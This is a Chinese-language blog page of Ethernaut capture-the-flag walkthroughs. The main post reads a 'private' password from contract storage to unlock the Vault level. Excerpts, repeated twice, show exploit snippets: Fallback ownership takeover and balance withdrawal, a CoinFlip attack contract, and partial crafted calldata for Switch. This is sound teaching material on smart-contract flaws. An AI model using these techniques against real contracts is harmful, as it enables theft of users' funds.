
智能合约黑客攻击 Ethernaut: 29. Switch
Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏,每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目将合约中的 switchOn 改为 trueHack思路这道题 难度比较高,需要构建非常特殊的 CALLDATA 。const attack = '0x30c13ade0000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000020606e1500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000476227e120000000000000000000...

智能合约黑客攻击 Ethernaut: 1.Fallback
Ethernaut 是一个基于 Web3/Solidity 的对抗游戏,受 overthewire.org 启发, 运行于以太坊虚拟机. 每个关卡是一个需要被 ‘hacked’ 的智能合约。题目把 Fallback 合约中的 owner改为自己,并且把合约中的余额转走。Hack思路合约本来应该是想做一个捐款合约,捐钱最多的人拥有这个合约的权限,但是在接收 Ether 的 receive() 回调方法里验证逻辑不对,可以比较容易跳过检查, 用非常少的钱就用有这个合约的 Owner 权限。// 1.检查合约owner、余额等信息 await contract.owner(); await getBalance(contract.address) // 2.发送最低金额以成为捐款人 await contract.contribute({value: toWei("0.0001")}) // 3.直接发送给合同 1 wei,这将使我们成为新的所有者 await sendTransaction({ from: player, to: contract.address , value:1 }...

智能合约黑客攻击 Ethernaut: 3. CoinFlip
Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏,每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目一个猜硬币正反面游戏,需要连续猜对10次。Hack思路所有的计算逻辑全部都写在了合约里,完全可以把逻辑复制一份计算出来。interface ICoinFlipChallenge { function flip(bool _guess) external returns (bool); } contract CoinFlipAttack { uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968; ICoinFlipChallenge public exploitInst; constructor(address _target) { exploitInst = ICoinFlipChallen...
Twitter: https://twitter.com/LeekDEV YouTube: https://www.youtube.com/@LeekDEV BILIBILI: https://space.bilibili.com/3493272831920239



智能合约黑客攻击 Ethernaut: 29. Switch
Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏,每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目将合约中的 switchOn 改为 trueHack思路这道题 难度比较高,需要构建非常特殊的 CALLDATA 。const attack = '0x30c13ade0000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000020606e1500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000476227e120000000000000000000...

智能合约黑客攻击 Ethernaut: 1.Fallback
Ethernaut 是一个基于 Web3/Solidity 的对抗游戏,受 overthewire.org 启发, 运行于以太坊虚拟机. 每个关卡是一个需要被 ‘hacked’ 的智能合约。题目把 Fallback 合约中的 owner改为自己,并且把合约中的余额转走。Hack思路合约本来应该是想做一个捐款合约,捐钱最多的人拥有这个合约的权限,但是在接收 Ether 的 receive() 回调方法里验证逻辑不对,可以比较容易跳过检查, 用非常少的钱就用有这个合约的 Owner 权限。// 1.检查合约owner、余额等信息 await contract.owner(); await getBalance(contract.address) // 2.发送最低金额以成为捐款人 await contract.contribute({value: toWei("0.0001")}) // 3.直接发送给合同 1 wei,这将使我们成为新的所有者 await sendTransaction({ from: player, to: contract.address , value:1 }...

智能合约黑客攻击 Ethernaut: 3. CoinFlip
Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏,每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目一个猜硬币正反面游戏,需要连续猜对10次。Hack思路所有的计算逻辑全部都写在了合约里,完全可以把逻辑复制一份计算出来。interface ICoinFlipChallenge { function flip(bool _guess) external returns (bool); } contract CoinFlipAttack { uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968; ICoinFlipChallenge public exploitInst; constructor(address _target) { exploitInst = ICoinFlipChallen...
Twitter: https://twitter.com/LeekDEV YouTube: https://www.youtube.com/@LeekDEV BILIBILI: https://space.bilibili.com/3493272831920239

Subscribe to Leek DEV

Subscribe to Leek DEV
Share Dialog
Share Dialog
Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏,每个关卡都有需要被 Hack 的智能合约。
….
这个关和第0关 **0.Hello Ethernaut **类似, 都是直接把密码存在链上,只不过本关将变量设置为 private,其他合约就不方便直接读取,但是可以通过读 password 对应 slot里的数据来破解密码。
// 浏览器控制台直读第二个 slot
await web3.eth.getStorageAt(instance, 1);
Output:
// 用读取到的密码解锁
contract.unlock("...");
foundry 操作参考
bytes32 password = vm.load(levelAddress, bytes32(uint256(1)));
exploitInst.unlock(password);
…
PS:现在的去中心化的区块链上所有的内容只能证明是你的,但是不能保证只有能查看。
….
Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏,每个关卡都有需要被 Hack 的智能合约。
….
这个关和第0关 **0.Hello Ethernaut **类似, 都是直接把密码存在链上,只不过本关将变量设置为 private,其他合约就不方便直接读取,但是可以通过读 password 对应 slot里的数据来破解密码。
// 浏览器控制台直读第二个 slot
await web3.eth.getStorageAt(instance, 1);
Output:
// 用读取到的密码解锁
contract.unlock("...");
foundry 操作参考
bytes32 password = vm.load(levelAddress, bytes32(uint256(1)));
exploitInst.unlock(password);
…
PS:现在的去中心化的区块链上所有的内容只能证明是你的,但是不能保证只有能查看。
….
<100 subscribers
<100 subscribers
No activity yet